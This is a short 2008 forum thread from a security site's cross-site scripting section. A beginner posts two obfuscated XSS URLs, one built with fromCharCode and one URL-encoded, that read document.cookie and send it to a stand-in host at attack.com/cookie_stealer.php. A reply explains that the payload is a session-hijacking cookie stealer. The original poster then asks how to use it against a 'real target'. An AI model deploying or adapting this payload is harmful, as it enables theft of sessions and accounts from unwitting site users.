 |
Menu |
 |
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| |
|
|
|
|
|
 |
User Info |
 |
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9145
People Online:
Visitors: 434
Members: 0
Total: 434
|
|
|
|
|
 |
PacketStorm News |
 |
|
|
 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 |
help with this code |
 |
Posted: Mon Nov 10, 2008 12:02 pm |
|
|
dreamci |
Beginner |

 |
|
Joined: Nov 09, 2008 |
Posts: 3 |
|
|
|
 |
 |
 |
|
hello can anyone tell me what this code do:)
Code: |
http://site.com/page.php?notice=</span><script>x=String.fromCharCode(104,116,116,112,58,47,47,119,119,119,46,97,116,116,97, 99,107,46,99,111,109,47,99,111,111,107,105,101,95,115,116,101,97,108,101,114,46,112,104,112,63,99,111,111,107,105,101,61);c=document.cookie;document.l ocation=x.concat(c);</script>
http://site.com/page?notice=%3c%2f%73%70%61%6e%3e%3c%73%63%72%69%70%74%3e%78%3d%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68% 61%72%43%6f%64%65%28%31%30%34%2c%31%31%36%2c%31%31%36%2c%31%31%32%2c%35%38%2c%34%37%2c%34%37%2c%31%31%39%2c%31%31%39%2c%31%31%39%2c%34%36%2c%39%37%2c% 31%31%36%2c%31%31%36%2c%39%37%2c%39%39%2c%31%30%37%2c%34%36%2c%39%39%2c%31%31%31%2c%31%30%39%2c%34%37%2c%39%39%2c%31%31%31%2c%31%31%31%2c%31%30%37%2c% 31%30%35%2c%31%30%31%2c%39%35%2c%31%31%35%2c%31%31%36%2c%31%30%31%2c%39%37%2c%31%30%38%2c%31%30%31%2c%31%31%34%2c%34%36%2c%31%31%32%2c%31%30%34%2c%31% 31%32%2c%36%33%2c%39%39%2c%31%31%31%2c%31%31%31%2c%31%30%37%2c%31%30%35%2c%31%30%31%2c%36%31%29%3b%63%3d%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65% 3b%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%3d%78%2e%63%6f%6e%63%61%74%28%63%29%3b%3c%2f%73%63%72%69%70%74%3e |
|
|
|
|
|
 |
 |
|
 |
Posted: Mon Nov 10, 2008 12:09 pm |
|
|
lenny |
Valuable expert |

 |
|
Joined: May 15, 2008 |
Posts: 275 |
|
|
|
 |
 |
 |
|
Its a cookie stealer for session hijacking.
"http://www.attack.com/cookie_stealer.php?cookie=" followed by the document cookie. |
|
|
|
|
Posted: Mon Nov 10, 2008 12:11 pm |
|
|
dreamci |
Beginner |

 |
|
Joined: Nov 09, 2008 |
Posts: 3 |
|
|
|
 |
 |
 |
|
how can i use it on my real target? when i use it nothings happen. no error no popup nothing. |
|
|
|
|
www.waraxe.us Forum Index -> Cross-site scripting aka XSS
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|